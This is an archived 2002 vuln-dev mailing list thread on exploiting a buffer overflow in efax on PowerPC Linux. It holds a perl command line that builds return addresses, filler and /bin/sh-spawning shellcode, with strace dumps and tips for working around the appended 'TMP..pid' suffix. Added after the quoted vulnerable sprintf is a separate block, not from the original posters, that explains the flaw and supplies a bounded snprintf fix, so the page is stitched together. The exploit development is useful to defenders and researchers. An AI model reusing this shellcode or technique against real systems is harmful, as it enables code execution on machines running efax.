Vulnerability Development mailing list archives

Re: efax - Exploitation info


From: KF <dotslash () snosoft com>
Date: Thu, 17 Jan 2002 15:12:42 -0500

I was playing with efax on ppc and it is REAL picky about how the shellcode is laid out... or it could be a problem with a char in my shellcode also. Regardless, the layout is <returns><nops><shellcode>. I have found I must have a trailing 0x2f if I try this method... otherwise the /sh gets lopped off. It then adds ..0 and then the pid of the process. This is obvious if you look at the code below provided by s1gnal_9. Here are some strace dumps and some ugly perl from me, so have fun. (perl is NOT my forte) and sorry that my MUI sucks and chops all my lines up...

[root@linuxppc root]# strace /usr/bin/efax -x `perl -e 'print "\x7f\xff\x25\xc0" x 274'``perl -e 'print "\x69\x69\x69\x69" x 14'``perl -e 'print"\x7c\xa5\x2a\x78\x40\x82\xff\xed\x7f\xe8\x02\xa6\x3b\xff\x01\x30\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x3b\xc0\x01\x60\x7f\xc0\x2e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68\x2f" x 1'``perl -e 'print "\x69\x69\x69\x69" x 14'`

execve("/usr/bin/efax", ["/usr/bin/efax", "-x", "..( returns here) ÿ%Àÿ%Àiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii|¥*x@,ÿíè¦;ÿ08þô?aÿø?¡ÿü8?ÿø;À`À.pDÿÿ/bin/sh/iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii"], [/* 46 vars */]) = 0
...

write(2, "efax: 15:10 Error: can\'t open pr"..., 1279efax: 15:10 Error: can't open pre-lock file ( returns here ) %Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii|¥*x@,ÿíè¦;ÿ08þô?aÿø?¡ÿü8?ÿø;À`À.pDÿÿ/bin/sh/TMP..01350: File name too long
) = 1279
execve("/bin/sh/TMP..01350", ["/bin/sh/TMP..01350"]ptrace: umoven: Input/output error
, [/* 0 vars */]) = -1 ENOTDIR (Not a directory)
--- SIGILL (Illegal instruction) ---


If you look here you can see that somehow my execve got TMP..01350 appended to it and also a slash because obviously I put it there ... if I didn't add the / my execve would say execve("/bin/TMP..01350", ["/bin/TMP..01350"] ...
instead I am left to work with the following...

execve("/bin/sh/TMP..01350", ["/bin/sh/TMP..01350"]ptrace: umoven: Input/output error
, [/* 0 vars */]) = -1 ENOTDIR (Not a directory)

it is workable though *grin*... adjust the shellcode a bit and add TMP..pid on to the end of it ... mkdir /tmp/sh/ and copy a few binaries to TMP..0xxxx

Have fun and if you don't maybe you can work out a better way. (I just thought of one but I am lazy ... it involves lopping off sh and just using TMP..pid for the bin).

-KF

+++ killed by SIGILL +++

s1gnal_9 wrote:

More info about the overflow...

Straight from efax src.

<--snip--->
#define EFAX_PATH_MAX 1024
<--/snip--->

<--snip--->
char *p , buf [ EFAX_PATH_MAX ] = "" ;
<--/snip--->

<--snip--->
sprintf ( buf , "%.*sTMP..%05d" , dirlen , fname , (int) pid ) ;
<--/snip--->
The sprintf above causes the overflow.
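The quoted sprintf writes "<directory prefix of fname>TMP..<pid>" into a fixed 1024-byte buffer with no check that it fits, which is what the long -x argument above trips. The following is an added example (not efax source, and not code from either poster) of the bounded form a maintainer would substitute: snprintf is told the buffer size, and its return value is checked so an oversized name is refused rather than overrunning buf. The dir_prefix_len helper is an assumption about how dirlen is derived (everything up to and including the last '/'); it is written here only to reproduce the behaviour visible in the strace output, where "/bin/sh/" yields "/bin/sh/TMP..01350" and "/bin/sh" yields "/bin/TMP..01350".

```c
#include <stdio.h>
#include <string.h>

#define EFAX_PATH_MAX 1024

/* Length of the directory prefix of a path: everything up to and including
 * the last '/', or 0 if there is no slash. This is the dirlen that the
 * lock-file name keeps from fname. (Assumed helper for this example; the
 * page does not show how efax computes dirlen.) */
size_t dir_prefix_len(const char *fname)
{
    const char *slash = strrchr(fname, '/');
    return slash ? (size_t)(slash - fname) + 1 : 0;
}

/* Bounded replacement for the unchecked sprintf in the quoted snippet.
 * Writes "<prefix>TMP..<pid>" into buf (bufsize bytes). Returns the length of
 * the name on success, or -1 when dirlen is out of range or the result would
 * not fit; in that case buf is left empty instead of being overrun. */
int build_lock_name(char *buf, size_t bufsize, const char *fname,
                    size_t dirlen, int pid)
{
    if (bufsize == 0) return -1;
    if (dirlen > strlen(fname)) { buf[0] = '\0'; return -1; }
    int n = snprintf(buf, bufsize, "%.*sTMP..%05d", (int)dirlen, fname, pid);
    if (n < 0 || (size_t)n >= bufsize) { buf[0] = '\0'; return -1; }
    return n;
}

/* Convenience wrapper: builds the name into a static buffer limited to
 * 'limit' bytes (capped at EFAX_PATH_MAX) and returns it, or NULL if refused. */
const char *lock_name_or_null(const char *fname, size_t limit, int pid)
{
    static char buf[EFAX_PATH_MAX];
    if (limit > sizeof buf) limit = sizeof buf;
    if (build_lock_name(buf, limit, fname, dir_prefix_len(fname), pid) < 0)
        return NULL;
    return buf;
}

int main(void)
{
    /* Constructed inputs mirroring the names seen in the strace output. */
    const char *ok = lock_name_or_null("/bin/sh/", EFAX_PATH_MAX, 1350);
    printf("%s\n", ok ? ok : "(refused)");

    /* Constructed oversized path: 1086 'A's followed by '/'. */
    char longname[EFAX_PATH_MAX + 64];
    memset(longname, 'A', sizeof longname - 1);
    longname[sizeof longname - 2] = '/';
    longname[sizeof longname - 1] = '\0';
    const char *bad = lock_name_or_null(longname, EFAX_PATH_MAX, 1350);
    printf("%s\n", bad ? bad : "(refused: name would not fit in EFAX_PATH_MAX)");
    return 0;
}
```

The size check is on the return value of snprintf rather than on strlen(fname) alone, because the fixed "TMP.." suffix and the five-digit pid also count toward the 1024-byte limit; a caller that hits -1 should report an error (as efax does for the pre-lock file) rather than proceed with a truncated path.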



